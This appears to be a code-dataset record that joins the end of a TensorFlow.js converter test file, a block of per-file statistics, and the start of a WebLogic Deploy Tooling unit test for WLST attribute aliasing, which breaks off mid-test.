  """A model containing control flow converts to a valid artifact."""
  self._create_saved_model_with_control_flow()
  model_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tf_saved_model_conversion_v2.convert_tf_saved_model(model_dir, model_dir)

  # Check model.json and weights manifest.
  with open(os.path.join(model_dir, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  manifest = model_json['weightsManifest']
  self.assertCountEqual(manifest[0]['paths'], ['group1-shard1of1.bin'])
  self.assertIn('weights', manifest[0])

  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(model_json['convertedBy'],
                   'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'], tf.__version__)
  self.assertTrue(glob.glob(os.path.join(model_dir, 'group*-*')))
def test_convert_saved_model_with_control_flow_v2(self):
  """With control_flow_v2=True, v1 control flow (Merge/Switch) is rewritten
  into functional ops such as StatelessWhile."""
  self._create_saved_model_with_control_flow()
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tf_saved_model_conversion_v2.convert_tf_saved_model(
      tfjs_path, tfjs_path, control_flow_v2=True
  )
  # Check model.json and weights manifest.
  with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  weights_manifest = model_json['weightsManifest']
  self.assertCountEqual(weights_manifest[0]['paths'],
                        ['group1-shard1of1.bin'])
  self.assertIn('weights', weights_manifest[0])
  # The loop constant must have been hoisted/renamed out of the loop body:
  # a weight containing 'add/y' exists but no longer starts with it.
  add_y_weight = None
  for weight in weights_manifest[0]['weights']:
    if 'add/y' in weight['name']:
      add_y_weight = weight
  self.assertIsNot(add_y_weight, None)
  self.assertFalse(add_y_weight['name'].startswith('add/y'))
  nodes = model_json['modelTopology']['node']
  while_op = None
  for node in nodes:
    # v1 control-flow primitives must be completely rewritten away.
    self.assertNotIn('Merge', node['op'])
    self.assertNotIn('Switch', node['op'])
    if node['op'] == 'StatelessWhile':
      while_op = node
  self.assertIsNot(while_op, None)
  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(
      model_json['convertedBy'],
      'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'],
                   tf.__version__)
  self.assertTrue(
      glob.glob(
          os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_sharded(self):
  """weight_shard_size_bytes splits the weights into multiple .bin shards."""
  self._create_saved_model()
  model_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  # Do initial conversion without sharding.
  tf_saved_model_conversion_v2.convert_tf_saved_model(model_path, tfjs_path)
  weight_files = glob.glob(os.path.join(tfjs_path, 'group*.bin'))
  # Get size of weights in bytes after graph optimizations.
  optimized_total_weight = sum([os.path.getsize(f) for f in weight_files])
  # Due to the shard size, there ought to be 2 shards after conversion.
  # (0.8x the total means the first shard fills up and a smaller second
  # shard takes the remainder.)
  weight_shard_size_bytes = int(optimized_total_weight * 0.8)
  tfjs_path = os.path.join(self._tmp_dir, 'sharded_model')
  # Convert Saved Model again with shard argument set.
  tf_saved_model_conversion_v2.convert_tf_saved_model(
      model_path, tfjs_path,
      weight_shard_size_bytes=weight_shard_size_bytes)
  weight_files = sorted(glob.glob(os.path.join(tfjs_path, 'group*.bin')))
  self.assertEqual(len(weight_files), 2)
  # Sharding must not change the total payload, only its layout.
  weight_file_sizes = [os.path.getsize(f) for f in weight_files]
  self.assertEqual(sum(weight_file_sizes), optimized_total_weight)
  self.assertLess(weight_file_sizes[1], weight_file_sizes[0])
def test_optimizer_add_unsupported_op(self):
  """Converting a model with unsupported ops raises a ValueError."""
  self._create_unsupported_saved_model()
  # assertRaisesRegex replaces the deprecated assertRaisesRegexp alias
  # (this file is Python 3 only -- it already uses assertCountEqual),
  # so the pylint deprecated-method suppression is no longer needed.
  with self.assertRaisesRegex(ValueError, r'^Unsupported Ops'):
    tf_saved_model_conversion_v2.convert_tf_saved_model(
        os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
        os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
    )
def test_convert_saved_model_skip_op_check(self):
  """With skip_op_check=True an unsupported-op model still converts."""
  self._create_unsupported_saved_model()
  model_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tf_saved_model_conversion_v2.convert_tf_saved_model(
      model_dir, model_dir, skip_op_check=True
  )

  # Check model.json and weights manifest.
  with open(os.path.join(model_dir, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  manifest = model_json['weightsManifest']
  self.assertCountEqual(manifest[0]['paths'], ['group1-shard1of1.bin'])
  self.assertIn('weights', manifest[0])
  self.assertTrue(glob.glob(os.path.join(model_dir, 'group*-*')))
# (TODO: piyu) disable this test, need to change
# convert_variables_to_constants_v2 to set function_optimization=aggressive.
@unittest.skip('not supported')
def test_convert_saved_model_strip_debug_ops(self):
  """strip_debug_ops=True should drop Print/Assert/CheckNumerics nodes.

  Currently skipped: the v2 freezing path does not yet run the aggressive
  function optimization needed to strip these ops (see TODO above).
  """
  self._create_saved_model_with_debug_ops()
  tf_saved_model_conversion_v2.convert_tf_saved_model(
      os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
      os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
      strip_debug_ops=True)
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  # Check model.json and weights manifest.
  with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  weights_manifest = model_json['weightsManifest']
  self.assertCountEqual(weights_manifest[0]['paths'],
                        ['group1-shard1of1.bin'])
  self.assertIn('weights', weights_manifest[0])
  self.assertTrue(
      glob.glob(
          os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_hub_module_v1(self):
  """A TF-Hub v1 module converts to a graph-model artifact."""
  self._create_hub_module()
  module_path = os.path.join(self._tmp_dir, HUB_MODULE_DIR)
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tf_saved_model_conversion_v2.convert_tf_hub_module(module_path, tfjs_path)

  # Check model.json and weights manifest.
  with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  manifest = model_json['weightsManifest']
  self.assertCountEqual(manifest[0]['paths'], ['group1-shard1of1.bin'])
  self.assertIn('weights', manifest[0])
  self.assertTrue(glob.glob(os.path.join(tfjs_path, 'group*-*')))
def test_convert_hub_module_v1_sharded(self):
  """Hub-module conversion honors weight_shard_size_bytes (3 shards)."""
  self._create_hub_module()
  module_path = os.path.join(self._tmp_dir, HUB_MODULE_DIR)
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  # Do initial conversion without sharding.
  tf_saved_model_conversion_v2.convert_tf_hub_module(module_path, tfjs_path)
  weight_files = glob.glob(os.path.join(tfjs_path, 'group*.bin'))
  # Get size of weights in bytes after graph optimizations.
  optimized_total_weight = sum([os.path.getsize(f) for f in weight_files])
  # Due to the shard size, there ought to be 3 shards after conversion.
  # (0.4x the total: two full shards plus a smaller remainder shard.)
  weight_shard_size_bytes = int(optimized_total_weight * 0.4)
  tfjs_path = os.path.join(self._tmp_dir, 'sharded_model')
  # Convert Hub model again with shard argument set.
  tf_saved_model_conversion_v2.convert_tf_hub_module(
      module_path, tfjs_path,
      weight_shard_size_bytes=weight_shard_size_bytes)
  weight_files = sorted(glob.glob(os.path.join(tfjs_path, 'group*.bin')))
  self.assertEqual(len(weight_files), 3)
  # Sharding must not change the total payload, only its layout.
  weight_file_sizes = [os.path.getsize(f) for f in weight_files]
  self.assertEqual(sum(weight_file_sizes), optimized_total_weight)
  self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
  self.assertLess(weight_file_sizes[2], weight_file_sizes[0])
def test_convert_hub_module_v2(self):
  """A TF2 SavedModel converts through the hub-module entry point."""
  self._create_saved_model()
  module_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  # Explicit signature name and tag exercise the v2 hub code path.
  tf_saved_model_conversion_v2.convert_tf_hub_module(
      module_path, tfjs_path, "serving_default", "serve")

  # Check model.json and weights manifest.
  with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  manifest = model_json['weightsManifest']
  self.assertCountEqual(manifest[0]['paths'], ['group1-shard1of1.bin'])
  self.assertIn('weights', manifest[0])
  self.assertTrue(glob.glob(os.path.join(tfjs_path, 'group*-*')))
def test_convert_frozen_model(self):
  """A frozen GraphDef converts; its signature has outputs but no inputs.

  Fix: removed a leftover debug print() of the frozen-model directory
  listing that only added noise to the test output.
  """
  self.create_frozen_model()
  frozen_dir = os.path.join(self._tmp_dir, FROZEN_MODEL_DIR)
  tf_saved_model_conversion_v2.convert_tf_frozen_model(
      os.path.join(frozen_dir, 'model.frozen'),
      'Softmax',
      frozen_dir)
  # Check model.json and weights manifest.
  with open(os.path.join(frozen_dir, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  # frozen model signature has no input nodes.
  self.assertIsNot(signature['outputs'], None)
  weights_manifest = model_json['weightsManifest']
  self.assertCountEqual(weights_manifest[0]['paths'],
                        ['group1-shard1of1.bin'])
  self.assertIn('weights', weights_manifest[0])
  self.assertTrue(
      glob.glob(os.path.join(frozen_dir, 'group*-*')))
# Entry point: run the tests under TensorFlow's test runner.
if __name__ == '__main__':
  tf.test.main()
| 39.04
| 80
| 0.675205
| 4,890
| 37,088
| 4.858487
| 0.074233
| 0.066925
| 0.040828
| 0.043606
| 0.840306
| 0.81682
| 0.792449
| 0.771361
| 0.757808
| 0.740845
| 0
| 0.011873
| 0.193809
| 37,088
| 949
| 81
| 39.081138
| 0.782709
| 0.07981
| 0
| 0.687583
| 0
| 0
| 0.102181
| 0
| 0
| 0
| 0
| 0.001054
| 0.24032
| 1
| 0.049399
| false
| 0
| 0.026702
| 0
| 0.081442
| 0.001335
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c42a372ff15c2502e4f709baf9d2031db52277d
| 65,653
|
py
|
Python
|
core/src/test/python/aliases_test.py
|
zeusbaba/weblogic-deploy-tooling
|
78d4ea18f5a45f8c890556d99d6d1acd68d69eda
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
core/src/test/python/aliases_test.py
|
zeusbaba/weblogic-deploy-tooling
|
78d4ea18f5a45f8c890556d99d6d1acd68d69eda
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
core/src/test/python/aliases_test.py
|
zeusbaba/weblogic-deploy-tooling
|
78d4ea18f5a45f8c890556d99d6d1acd68d69eda
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
"""
Copyright (c) 2017, 2020, Oracle Corporation and/or its affiliates.
Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""
from org.python.modules import jarray
import unittest
from java.lang import Boolean
from java.lang import String, Long
from java.util import Properties
from oracle.weblogic.deploy.aliases import AliasException
from oracle.weblogic.deploy.aliases import TypeUtils
from wlsdeploy.aliases.aliases import Aliases
from wlsdeploy.aliases.location_context import LocationContext
import wlsdeploy.aliases.model_constants as FOLDERS
from wlsdeploy.aliases.validation_codes import ValidationCodes
from wlsdeploy.aliases.wlst_modes import WlstModes
from wlsdeploy.exception import exception_helper
import wlsdeploy.logging.platform_logger as platform_logger
from wlsdeploy.util.cla_utils import CommandLineArgUtil
from wlsdeploy.util.model_context import ModelContext
class AliasesTestCase(unittest.TestCase):
    """
    1) Unit tests must be a class that extends unittest.TestCase
    2) Class methods with names starting with 'test' will be executed by the framework (all others skipped)
    """
    # WebLogic Server version the alias definitions are resolved against.
    wls_version = '12.2.1.3'
    # Minimal command-line arguments needed to build a ModelContext.
    arg_map = {
        CommandLineArgUtil.ORACLE_HOME_SWITCH: '/oracleHome',
        CommandLineArgUtil.DOMAIN_HOME_SWITCH: ''
    }
    logger = platform_logger.PlatformLogger('wlsdeploy.unittest')
    model_context = ModelContext("test", arg_map)
    # create a set of aliases for use with WLST
    # Offline and online alias sets differ in folder naming (e.g. plural
    # 'JDBCSystemResources' vs singular) and token handling; several tests
    # below exercise both.
    aliases = Aliases(model_context=model_context, wlst_mode=WlstModes.OFFLINE, wls_version=wls_version)
    online_aliases = Aliases(model_context=model_context, wlst_mode=WlstModes.ONLINE, wls_version=wls_version)
def testDomainLevelAttributeAccessibility(self):
    """Verify attribute name/value mapping at the domain (root) location."""
    location = LocationContext()
    # [model value, expected WLST value]: the port converts str -> int.
    string_value = ['9002', 9002]
    model_attribute_name = 'AdministrationPort'
    model_attribute_value = string_value[0]
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, string_value[1])
    wlst_attribute_name = 'AdministrationPort'
    wlst_attribute_value = string_value[0]
    # NOTE(review): the reverse (WLST -> model) mapping yields None here --
    # presumably because '9002' matches the attribute's default and defaults
    # are suppressed in the model; confirm against the alias definitions.
    model_attribute_name, model_attribute_value = \
        self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
    self.assertEqual(model_attribute_value, None)
    # Descend into the JMX folder and check a boolean-typed attribute.
    location.append_location(FOLDERS.JMX)
    location.add_name_token("JMX", 'mydomain')
    string_value = ['true', 'true']
    model_attribute_name = 'EditMBeanServerEnabled'
    model_attribute_value = string_value[0]
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, string_value[1])
    return
def testDatasourceRootPath(self):
    """WLST attributes path for a named JDBCSystemResource folder."""
    expected = '/JDBCSystemResource/my-datasource'

    # First form: append the folder, then add the name token explicitly.
    location = LocationContext()
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'my-datasource')
    self.assertEqual(self.aliases.get_wlst_attributes_path(location), expected)

    # Second form: supply the token value as a keyword argument instead.
    location = LocationContext()
    kwargs = {token: 'my-datasource'}
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE, **kwargs)
    self.assertEqual(self.aliases.get_wlst_attributes_path(location), expected)
    return
def testDatasourceParamsPath(self):
    """WLST attributes path for JDBCDataSourceParams under a datasource."""
    location = get_jdbc_ds_params_location('my-datasource', self.aliases)
    actual = self.aliases.get_wlst_attributes_path(location)
    self.assertEqual(
        actual,
        '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDataSourceParams/NO_NAME_0')
    return
def testDatasourceDriverPropertiesPath(self):
    """Driver-property list and attribute paths differ between offline
    (singular folders, NO_NAME_0 tokens) and online (plural folders,
    real names) WLST modes."""
    location = get_jdbc_params_properties_location('my-datasource', self.aliases)
    expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/' \
               'JDBCDriverParams/NO_NAME_0/Properties/NO_NAME_0/Property'
    path1 = self.aliases.get_wlst_list_path(location)
    self.assertEqual(path1, expected)
    online_location = get_jdbc_params_properties_location('my-datasource', self.online_aliases)
    expected = '/JDBCSystemResources/my-datasource/JDBCResource/my-datasource/' \
               'JDBCDriverParams/my-datasource/Properties/my-datasource/Properties'
    path2 = self.online_aliases.get_wlst_list_path(online_location)
    self.assertEqual(path2, expected)
    # Path to access a single property by name (user in this example)
    expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/' \
               'JDBCDriverParams/NO_NAME_0/Properties/NO_NAME_0/Property/user'
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'user')
    path1 = self.aliases.get_wlst_attributes_path(location)
    self.assertEqual(path1, expected)
    expected = '/JDBCSystemResources/my-datasource/JDBCResource/my-datasource/' \
               'JDBCDriverParams/my-datasource/Properties/my-datasource/Properties/user'
    # NOTE(review): this fetches the token via self.aliases (offline) for an
    # online location -- it passes, so token names appear mode-independent,
    # but confirm this wasn't meant to be self.online_aliases.
    online_location.add_name_token(self.aliases.get_name_token(online_location), 'user')
    path2 = self.online_aliases.get_wlst_attributes_path(online_location)
    self.assertEqual(path2, expected)
    return
def testDatasourceMbeanListPath(self):
    """The list path for JDBCSystemResource is the bare folder path."""
    location = LocationContext()
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    actual = self.aliases.get_wlst_list_path(location)
    self.assertEqual(actual, '/JDBCSystemResource')
    return
def testDatasourceSubfoldersPath(self):
    """Subfolders path for the JdbcResource of a named datasource."""
    location = get_jdbc_resource_location('my-datasource', self.aliases)
    actual = self.aliases.get_wlst_subfolders_path(location)
    self.assertEqual(
        actual, '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource')
    return
def testMachineMbeanListPath(self):
    """The list path for the Machine folder is the bare folder path."""
    location = LocationContext()
    location.append_location(FOLDERS.MACHINE)
    actual = self.aliases.get_wlst_list_path(location)
    self.assertEqual(actual, '/Machine')
    return
def testDatasourceMbeanType(self):
    """MBean type of the top-level JDBCSystemResource folder."""
    location = LocationContext()
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    actual = self.aliases.get_wlst_mbean_type(location)
    self.assertEqual(actual, 'JDBCSystemResource')
    return
def testDatasourceSubfolderMbeanType(self):
    """MBean type of the JDBCDriverParams subfolder."""
    location = get_jdbc_driver_params_location('my-datasource', self.aliases)
    actual = self.aliases.get_wlst_mbean_type(location)
    self.assertEqual(actual, 'JDBCDriverParams')
    return
def testDatasourceSubFolderMbeanName(self):
    """Offline WLST uses the NO_NAME_0 placeholder for unnamed MBeans."""
    location = get_jdbc_ds_params_location('my-datasource', self.aliases)
    actual = self.aliases.get_wlst_mbean_name(location)
    self.assertEqual(actual, 'NO_NAME_0')
    return
def testGetModelSubFolders(self):
    """get_model_subfolder_names returns exactly the JDBC resource subfolders
    (order-insensitive)."""
    expected = ['JDBCOracleParams', 'JDBCConnectionPoolParams', 'JDBCXAParams',
                'JDBCDataSourceParams', 'JDBCDriverParams']
    location = get_jdbc_resource_location('my-datasource', self.aliases)
    names = self.aliases.get_model_subfolder_names(location)
    # Same length plus membership of every name == set equality (the alias
    # folder names are unique).
    self.assertEqual(len(names), len(expected))
    for name in names:
        # Fix: assertIn reports the offending name on failure, unlike the
        # original assertEqual(name in expected, True).
        self.assertIn(name, expected)
    return
def testAppDeploymentPathTokenReplacement(self):
    """Path tokens (@@PWD@@, @@WL_HOME@@) in path attributes are replaced
    when converting model values to WLST values."""
    expected = self.model_context.replace_token_string('@@PWD@@/target/applications/simpleear.ear')
    location = LocationContext()
    location.append_location(FOLDERS.APPLICATION)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'simpleear')
    model_attribute_name = 'SourcePath'
    model_attribute_value = '@@PWD@@/target/applications/simpleear.ear'
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, expected)
    # Repeat for a shared library path using the @@WL_HOME@@ token.
    expected = self.model_context.replace_token_string('@@WL_HOME@@/common/deployable-libraries/jsf-2.0.war')
    location = LocationContext()
    location.append_location(FOLDERS.LIBRARY)
    token = self.aliases.get_name_token(location)
    if token:
        # Versioned library name: name#spec-version@impl-version.
        location.add_name_token(token, 'jsf#2.0@1.0.0.0_2-0-2')
    model_attribute_name = 'SourcePath'
    model_attribute_value = '@@WL_HOME@@/common/deployable-libraries/jsf-2.0.war'
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, expected)
    return
def testReadOnlyAttributeAccess(self):
    """A read-only attribute maps to (None, None) in online mode."""
    location = LocationContext()
    location.append_location(FOLDERS.APPLICATION)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'simpleear')

    # AbsoluteSourcePath is read-only online, so no WLST name or value
    # should be produced for it.
    wlst_name, wlst_value = \
        self.online_aliases.get_wlst_attribute_name_and_value(
            location, 'AbsoluteSourcePath', '@@PWD@@/target/applications/simpleear.ear')
    self.assertEqual(wlst_name, None)
    self.assertEqual(wlst_value, None)
    return
def testWlstAttributeValueConversion(self):
    """Model attribute values convert to the WLST-side type: string passthrough,
    string-to-int, string-to-java.lang.Long, and int-to-boolean-string."""
    location = get_jdbc_ds_params_location('my-datasource', self.aliases)
    # pairs are [model value, expected WLST value]
    string_value = ['Hello', 'Hello']
    model_attribute_name = 'AlgorithmType'
    model_attribute_value = string_value[0]
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, string_value[1])
    # string '123' converts to the int 123
    string_value = ['123', 123]
    model_attribute_name = 'RowPrefetchSize'
    model_attribute_value = string_value[0]
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, string_value[1])
    # string '3600' converts to java.lang.Long for a JMS default delivery param
    string_value = ['3600', Long(3600)]
    jms_location = LocationContext()
    jms_location.append_location(FOLDERS.JMS_SYSTEM_RESOURCE)
    jms_location.add_name_token(self.aliases.get_name_token(jms_location), 'my-module')
    jms_location.append_location(FOLDERS.JMS_RESOURCE)
    add_default_token_value(jms_location, self.aliases)
    jms_location.append_location(FOLDERS.CONNECTION_FACTORY)
    jms_location.add_name_token(self.aliases.get_name_token(jms_location), 'my-connectionfactory')
    jms_location.append_location(FOLDERS.DEFAULT_DELIVERY_PARAMS)
    add_default_token_value(jms_location, self.aliases)
    model_attribute_name = 'DefaultTimeToLive'
    model_attribute_value = string_value[0]
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(jms_location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, string_value[1])
    # confirm the runtime type really is java.lang.Long, not just value equality
    self.assertEqual(wlst_attribute_value.getClass().getName(), 'java.lang.Long')
    # int 1 converts to the string 'true'
    string_value = [1, 'true']
    model_attribute_name = 'RowPrefetch'
    model_attribute_value = string_value[0]
    wlst_attribute_name, wlst_attribute_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
    self.assertEqual(wlst_attribute_value, string_value[1])
    return
def testWlstAttributeListValueConversion(self):
    """A comma-separated model string becomes a Python list offline and a java
    String[] online; a jarray input converts back to a Python list offline."""
    ds_location = get_jdbc_ds_params_location('my-datasource', self.aliases)
    attr_name = 'JNDIName'
    model_value = 'com.bea.datasource1, com.bea.datasource2'
    expected_offline = ['com.bea.datasource1', 'com.bea.datasource2']
    # offline: Python list with whitespace trimmed
    _, offline_value = self.aliases.get_wlst_attribute_name_and_value(ds_location, attr_name, model_value)
    self.assertEqual(offline_value, expected_offline)
    # online: java String[]
    expected_online = jarray.zeros(2, String)
    expected_online[0] = 'com.bea.datasource1'
    expected_online[1] = 'com.bea.datasource2'
    _, online_value = self.online_aliases.get_wlst_attribute_name_and_value(ds_location, attr_name, model_value)
    self.assertEqual(online_value, expected_online)
    # round-trip: jarray input converts to a Python list offline
    _, roundtrip_value = self.aliases.get_wlst_attribute_name_and_value(ds_location, attr_name, expected_online)
    self.assertEqual(roundtrip_value, expected_offline)
    return
def testModelAttributeValueConversion(self):
    """WLST values convert to their model representation: string passthrough,
    string-to-int, and int-to-boolean-string."""
    location = LocationContext()
    location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    token = self.aliases.get_name_token(location)
    if token:
        location.add_name_token(token, 'my-datasource')
    location.append_location(FOLDERS.JDBC_RESOURCE)
    location.append_location(FOLDERS.JDBC_DATASOURCE_PARAMS)
    # (wlst attribute name, wlst value, expected model value)
    conversion_cases = [
        ('AlgorithmType', 'Hello', 'Hello'),
        ('RowPrefetchSize', '123', 123),
        ('RowPrefetch', 1, 'true'),
    ]
    for wlst_name, wlst_value, expected_model_value in conversion_cases:
        _, model_value = self.aliases.get_model_attribute_name_and_value(location, wlst_name, wlst_value)
        self.assertEqual(model_value, expected_model_value)
    return
def testConvertToTypeJarray(self):
    """A java String[] WLST value converts to a Python list model value."""
    server_location = LocationContext()
    server_location.append_location(FOLDERS.SERVER)
    server_location.add_name_token(self.aliases.get_name_token(server_location), 'AdminServer')
    server_location.append_location('FederationServices')
    wlst_name = 'AssertionConsumerUri'
    wlst_value = jarray.zeros(2, String)
    wlst_value[0] = 'abc'
    wlst_value[1] = 'def'
    model_name, model_value = \
        self.aliases.get_model_attribute_name_and_value(server_location, wlst_name, wlst_value)
    self.assertEqual(model_name, wlst_name)
    self.assertEqual(type(model_value), list)
    self.assertEqual(model_value, ['abc', 'def'])
    return
def testGetWlstAttributeNameAndValue(self):
    """The WLST attribute value is returned even when it equals the default."""
    ds_location = get_jdbc_ds_params_location('my-datasource', self.aliases)
    # '0' is the model value; the converted WLST value (int 0) must still come back
    _, wlst_value = self.aliases.get_wlst_attribute_name_and_value(ds_location, 'RowPrefetchSize', '0')
    self.assertEqual(wlst_value, 0)
    return
def testGetModelAttributeNameAndValue(self):
    """A WLST value that equals the attribute default maps to a None model value."""
    location = get_jdbc_ds_params_location('my-datasource', self.aliases)
    # get model attribute value should return the value only if its NOT the default
    boolean_values = ['false', None]
    wlst_attribute_name = 'RowPrefetch'
    wlst_attribute_value = boolean_values[0]
    model_attribute_name, model_attribute_value = \
        self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
    self.assertEqual(model_attribute_value, boolean_values[1])
    # get model attribute value should return the value only if its NOT the default
    string_value = [None, None]
    wlst_attribute_name = 'RowPrefetchSize'
    wlst_attribute_value = string_value[0]
    model_attribute_name, model_attribute_value = \
        self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
    self.assertEqual(model_attribute_value, string_value[1])
    # get model attribute value should return the value only if its NOT the default;
    # here the WLST boolean 0 matches the default on a Server attribute
    location = LocationContext()
    location.append_location(FOLDERS.SERVER)
    boolean_values = [0, None]
    wlst_attribute_name = 'NetworkClassLoadingEnabled'
    wlst_attribute_value = boolean_values[0]
    model_attribute_name, model_attribute_value = \
        self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
    self.assertEqual(model_attribute_value, boolean_values[1])
    return
def testGetWlstAttributeName(self):
    """The RowPrefetch model attribute maps to the same WLST attribute name."""
    ds_location = LocationContext()
    ds_location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    name_token = self.aliases.get_name_token(ds_location)
    if name_token:
        ds_location.add_name_token(name_token, 'my-datasource')
    ds_location.append_location(FOLDERS.JDBC_RESOURCE)
    ds_location.append_location(FOLDERS.JDBC_DATASOURCE_PARAMS)
    resolved_name = self.aliases.get_wlst_attribute_name(ds_location, 'RowPrefetch')
    self.assertEqual(resolved_name, 'RowPrefetch')
    return
def testGetWlstAttributeName2(self):
    """Offline and online modes can map the same model attribute to different
    WLST attribute names (SafExportPolicy vs SAFExportPolicy)."""
    topic_location = LocationContext().append_location(FOLDERS.JMS_SYSTEM_RESOURCE)
    topic_location.add_name_token(self.aliases.get_name_token(topic_location), 'TheModule')
    topic_location.append_location(FOLDERS.JMS_RESOURCE)
    add_default_token_value(topic_location, self.aliases)
    topic_location.append_location(FOLDERS.DISTRIBUTED_TOPIC)
    topic_location.add_name_token(self.aliases.get_name_token(topic_location), 'TheTopic')
    attr_name = 'SafExportPolicy'
